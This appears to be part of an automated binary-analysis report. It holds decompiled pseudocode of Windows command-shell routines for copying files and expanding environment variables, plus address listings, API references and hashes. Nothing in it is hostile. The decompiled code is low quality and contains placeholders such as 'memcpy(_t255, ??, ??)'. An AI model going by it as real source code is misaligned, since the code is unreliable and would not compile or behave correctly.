				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E002B0C70( &_v1084, 0x7fe9) < 0 || E002B0C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E002B6FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E002B51C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E002AC5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E002B51C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E002B0D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E002C9583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0x2cd544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E002AC5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E002A83F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E002A83F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E002B25D9(L"%s\r\n");
										E002AC5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0x2e3cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E002AC108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E002A8512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E002B51C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E002C9583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E002AC5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}





























































                                              0x002a81e8
                                              0x002a81ee
                                              0x002a81f5
                                              0x002a81fc
                                              0x002a81ff
                                              0x002a8202
                                              0x002a820c
                                              0x002a8210
                                              0x002a8211
                                              0x002a8213
                                              0x002a821f
                                              0x002a8227
                                              0x002a822a
                                              0x002a822c
                                              0x002a823b
                                              0x002a8240
                                              0x002a824d
                                              0x002a8254
                                              0x002a825c
                                              0x002a8268
                                              0x002a826f
                                              0x002a8280
                                              0x002a8285
                                              0x002a8298
                                              0x002c01dd
                                              0x002c01dd
                                              0x00000000
                                              0x002a82b7
                                              0x002a82bb
                                              0x002a82e0
                                              0x002a82e0
                                              0x002a82e8
                                              0x002c01df
                                              0x002c01df
                                              0x002c01e1
                                              0x002c01e1
                                              0x002c01e3
                                              0x002c01e3
                                              0x002c01e5
                                              0x002c01e5
                                              0x002a83b4
                                              0x002a83bb
                                              0x002a83c9
                                              0x002a83d9
                                              0x002a83da
                                              0x002a83db
                                              0x002a83e6
                                              0x002a83e6
                                              0x002a82ee
                                              0x002a82f7
                                              0x002c0216
                                              0x002c0216
                                              0x002a8307
                                              0x002a830a
                                              0x002a8315
                                              0x002a8320
                                              0x002c021f
                                              0x002c022d
                                              0x002c0232
                                              0x00000000
                                              0x002a8326
                                              0x002a8326
                                              0x002a832f
                                              0x002c0237
                                              0x002c0237
                                              0x002a8339
                                              0x002a834e
                                              0x002c0243
                                              0x002c024a
                                              0x002c024c
                                              0x002c024e
                                              0x002c024e
                                              0x002c0253
                                              0x002c025a
                                              0x002c025a
                                              0x002a8358
                                              0x002c0264
                                              0x002c026b
                                              0x002c026d
                                              0x002c026f
                                              0x002c026f
                                              0x002c027b
                                              0x002c0280
                                              0x002c0285
                                              0x002c0287
                                              0x00000000
                                              0x002c028d
                                              0x002c028d
                                              0x002c0293
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0299
                                              0x002a835e
                                              0x002a835e
                                              0x002a835e
                                              0x002a8362
                                              0x002a836c
                                              0x002a836f
                                              0x002a837a
                                              0x002c029e
                                              0x002c02a5
                                              0x002c02a7
                                              0x002c02a9
                                              0x002c02a9
                                              0x002c02ad
                                              0x002c02b2
                                              0x002c02b8
                                              0x002c02ba
                                              0x00000000
                                              0x002c02c0
                                              0x002c02c0
                                              0x002c02c7
                                              0x002c02c8
                                              0x00000000
                                              0x002c02ce
                                              0x002c02ba
                                              0x002a8380
                                              0x002a8380
                                              0x002a8389
                                              0x002a83e9
                                              0x002a83e9
                                              0x002a838b
                                              0x002a8395
                                              0x002c02d4
                                              0x002c02db
                                              0x002c02dd
                                              0x002c02df
                                              0x002c02df
                                              0x002c02e3
                                              0x002c02eb
                                              0x002c02ed
                                              0x002c02ef
                                              0x00000000
                                              0x002c02f5
                                              0x002c02f5
                                              0x002c02fb
                                              0x00000000
                                              0x00000000
                                              0x002c0301
                                              0x002c0308
                                              0x002c030a
                                              0x002c030c
                                              0x002c030c
                                              0x002c0319
                                              0x002c0320
                                              0x002c0325
                                              0x00000000
                                              0x002c0325
                                              0x002a839b
                                              0x002a839b
                                              0x002a839b
                                              0x002a839f
                                              0x002a83a9
                                              0x002c032d
                                              0x002c0334
                                              0x002c0336
                                              0x002c0338
                                              0x002c0338
                                              0x002c0346
                                              0x002c034b
                                              0x002c034b
                                              0x00000000
                                              0x002a83a9
                                              0x002a8395
                                              0x002a8358
                                              0x002a82c9
                                              0x002a82cf
                                              0x002a82d4
                                              0x002a82da
                                              0x002c01a4
                                              0x002c01ab
                                              0x002c01ad
                                              0x002c01af
                                              0x002c01af
                                              0x002c01b3
                                              0x002c01be
                                              0x002c01c3
                                              0x002c01c5
                                              0x002c01ec
                                              0x002c01f3
                                              0x002c01f6
                                              0x002c01f8
                                              0x002c01fa
                                              0x002c01fa
                                              0x002c0203
                                              0x002c0208
                                              0x002c020d
                                              0x002c020f
                                              0x00000000
                                              0x002c0211
                                              0x00000000
                                              0x002c0211
                                              0x002c01c7
                                              0x002c01c7
                                              0x002c01d5
                                              0x002c01da
                                              0x00000000
                                              0x002c01da
                                              0x002c01c5
                                              0x00000000
                                              0x002a82da
                                              0x002a82bb

                                              APIs
                                              • memset.MSVCRT ref: 002A8254
                                              • memset.MSVCRT ref: 002A8280
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002A83BB
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002A83C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset
                                              • String ID: %s
                                              • API String ID: 2221118986-3043279178
                                              • Opcode ID: 8cd2d377a24022643b425592bd0775015e29c22aed7fac4cfc3dc3030bab0537
                                              • Instruction ID: f1433f394b3925efa8c45b0dfa70fe255c7cab8836526be6b657454cbee02c6c
                                              • Opcode Fuzzy Hash: 8cd2d377a24022643b425592bd0775015e29c22aed7fac4cfc3dc3030bab0537
                                              • Instruction Fuzzy Hash: 9A91ADB1628382DBDB20DF14C889FABB7E4BF85700F04461DF98987241DB74E964CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A8F70, Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 49%
                                              			E002A8F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0x2cbe58);
				_push(E002B7290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E002B00B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E002A93F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E002ACFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0x2e3cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0x2b7292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0x2b7292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0x2b7292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E002B6826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0x2b7292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0x2b7292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0x2b7292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E002AC5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E002B1040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E002B1040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0x2e3cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E002B00B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}










































































































                                              0x002a8f70
                                              0x002a8f75
                                              0x002a8f77
                                              0x002a8f7c
                                              0x002a8f87
                                              0x002a8f88
                                              0x002a8f8e
                                              0x002a8f93
                                              0x002a8f98
                                              0x002a8f9c
                                              0x002a8fa4
                                              0x002a8fa7
                                              0x002a8faa
                                              0x002a8fb1
                                              0x002a8fb3
                                              0x002a8fb6
                                              0x002a8fb8
                                              0x002a8fbb
                                              0x002a8fc3
                                              0x002a8fc8
                                              0x002a8fcd
                                              0x002c08a4
                                              0x002c08a9
                                              0x002a9369
                                              0x002a9369
                                              0x002a936c
                                              0x002a936c
                                              0x002a90d3
                                              0x002a90d3
                                              0x002a90da
                                              0x002a90e4
                                              0x002a90f2
                                              0x002a90f2
                                              0x002c08b2
                                              0x002c08b8
                                              0x002c08b8
                                              0x002c08bd
                                              0x002a9366
                                              0x002a9366
                                              0x00000000
                                              0x002a9366
                                              0x002c08c6
                                              0x002c08cc
                                              0x002c08cc
                                              0x002c08cf
                                              0x002c08d3
                                              0x002a9096
                                              0x002a9098
                                              0x002a909b
                                              0x002a909e
                                              0x002a90a1
                                              0x002a90a1
                                              0x002a90aa
                                              0x002a90b4
                                              0x002a90b6
                                              0x002a90bd
                                              0x002a90fc
                                              0x00000000
                                              0x002a9102
                                              0x002a9102
                                              0x002a9105
                                              0x002a910b
                                              0x002a91ef
                                              0x002a91f2
                                              0x002a9205
                                              0x002a9207
                                              0x002a920a
                                              0x002a920f
                                              0x002a922a
                                              0x002a922a
                                              0x002a922c
                                              0x002a922c
                                              0x002a9230
                                              0x002a9230
                                              0x002a9233
                                              0x002a9236
                                              0x002a9241
                                              0x002a93b6
                                              0x002a93b8
                                              0x002a93b8
                                              0x002a93c0
                                              0x002a93c0
                                              0x002a93c3
                                              0x002a93c6
                                              0x002a93cd
                                              0x002a9249
                                              0x002a924b
                                              0x002c08ed
                                              0x002a926d
                                              0x002a926d
                                              0x002a9270
                                              0x002a9277
                                              0x002a9377
                                              0x002a937a
                                              0x002a937c
                                              0x002a937c
                                              0x002a9380
                                              0x002a9380
                                              0x002a9383
                                              0x002a9386
                                              0x002a935d
                                              0x002a935f
                                              0x002a92c7
                                              0x002a92c7
                                              0x002a92ca
                                              0x002a92cc
                                              0x002a92cc
                                              0x002a92d0
                                              0x002a92d0
                                              0x002a92d3
                                              0x002a92d6
                                              0x002a92e2
                                              0x002a92e7
                                              0x002a92f1
                                              0x002c08f6
                                              0x002c08f6
                                              0x002a92f7
                                              0x002a92fd
                                              0x002a9300
                                              0x002a9303
                                              0x002a930a
                                              0x002c08ff
                                              0x002c08ff
                                              0x002c0902
                                              0x00000000
                                              0x002a9310
                                              0x002a9315
                                              0x002a91e2
                                              0x002a91e2
                                              0x002a91e4
                                              0x002a91e7
                                              0x00000000
                                              0x002a91e7
                                              0x002a930a
                                              0x002a927d
                                              0x002a9280
                                              0x002a9293
                                              0x002a9295
                                              0x002a929a
                                              0x002a938d
                                              0x002a9390
                                              0x002a9393
                                              0x002a9393
                                              0x002a9396
                                              0x002a9399
                                              0x002a93a2
                                              0x002a93a4
                                              0x002a93a9
                                              0x002a93af
                                              0x002a93af
                                              0x002a93a9
                                              0x002a92a0
                                              0x002a92a3
                                              0x002a92a6
                                              0x002a92a8
                                              0x002a92a8
                                              0x002a92b0
                                              0x002a92b0
                                              0x002a92b3
                                              0x002a92b6
                                              0x002a92c1
                                              0x002a934d
                                              0x002a934f
                                              0x002a934f
                                              0x002a9352
                                              0x002a9352
                                              0x002a9355
                                              0x002a9358
                                              0x00000000
                                              0x002a9352
                                              0x00000000
                                              0x002a92c1
                                              0x002a9251
                                              0x002a9253
                                              0x002a9253
                                              0x002a9256
                                              0x002a9256
                                              0x002a9259
                                              0x002a925c
                                              0x002a9267
                                              0x002a93d4
                                              0x002a93d6
                                              0x002a93d6
                                              0x002a93e0
                                              0x002a93e0
                                              0x002a93e3
                                              0x002a93e6
                                              0x002a93ed
                                              0x002a93ed
                                              0x00000000
                                              0x002a9267
                                              0x002a9247
                                              0x00000000
                                              0x002a9247
                                              0x002a9211
                                              0x002a9213
                                              0x002a9213
                                              0x002a9216
                                              0x002a9216
                                              0x002a9219
                                              0x002a921c
                                              0x002a9225
                                              0x002a9227
                                              0x00000000
                                              0x002a9227
                                              0x002a9114
                                              0x002c090a
                                              0x002c090d
                                              0x002c0910
                                              0x002a911a
                                              0x002a911a
                                              0x002a911a
                                              0x002a9121
                                              0x002a9123
                                              0x002a9126
                                              0x002a9128
                                              0x002a9128
                                              0x002a912e
                                              0x00000000
                                              0x00000000
                                              0x002a9135
                                              0x002a9138
                                              0x002a913b
                                              0x002a913b
                                              0x002a9143
                                              0x002c091c
                                              0x002c091c
                                              0x00000000
                                              0x002c091c
                                              0x002a914b
                                              0x002a914d
                                              0x002a914f
                                              0x002c0924
                                              0x002c0929
                                              0x00000000
                                              0x00000000
                                              0x002c0933
                                              0x002c0938
                                              0x002c093e
                                              0x002c0944
                                              0x002c0944
                                              0x002c0948
                                              0x002c0960
                                              0x00000000
                                              0x002c0960
                                              0x002a9155
                                              0x002a9158
                                              0x002a915a
                                              0x002a915d
                                              0x002a915d
                                              0x002a915f
                                              0x002a9162
                                              0x002a9168
                                              0x00000000
                                              0x00000000
                                              0x002a9170
                                              0x002a9170
                                              0x002a9179
                                              0x002a917c
                                              0x00000000
                                              0x00000000
                                              0x002a9182
                                              0x002a9185
                                              0x002a918c
                                              0x002a9194
                                              0x002a919a
                                              0x00000000
                                              0x00000000
                                              0x002a91a2
                                              0x002a91a7
                                              0x002a91ac
                                              0x002a91af
                                              0x002a91b2
                                              0x002a91b2
                                              0x002a91b7
                                              0x002a91bd
                                              0x002a91c2
                                              0x00000000
                                              0x00000000
                                              0x002a9322
                                              0x002a9325
                                              0x002a9326
                                              0x002a932d
                                              0x00000000
                                              0x00000000
                                              0x002a9334
                                              0x002a9339
                                              0x002a933f
                                              0x002a9342
                                              0x002a9345
                                              0x002a9345
                                              0x002a91c8
                                              0x002a91cb
                                              0x002a91ce
                                              0x002a91d1
                                              0x002a91d4
                                              0x002a91d7
                                              0x002a91dd
                                              0x00000000
                                              0x00000000
                                              0x002a91df
                                              0x00000000
                                              0x002a91df
                                              0x002a90fc
                                              0x002a90bf
                                              0x002a90c9
                                              0x002a90cb
                                              0x002a90cd
                                              0x002a90d0
                                              0x00000000
                                              0x002a90d0
                                              0x002a8fd3
                                              0x002a8fd5
                                              0x002a8fd8
                                              0x002a8fda
                                              0x002a8fe0
                                              0x002a8fe0
                                              0x002a8fe6
                                              0x00000000
                                              0x00000000
                                              0x002a8fe8
                                              0x002a8fef
                                              0x00000000
                                              0x002a8ffa
                                              0x002a8ffa
                                              0x002a8ffa
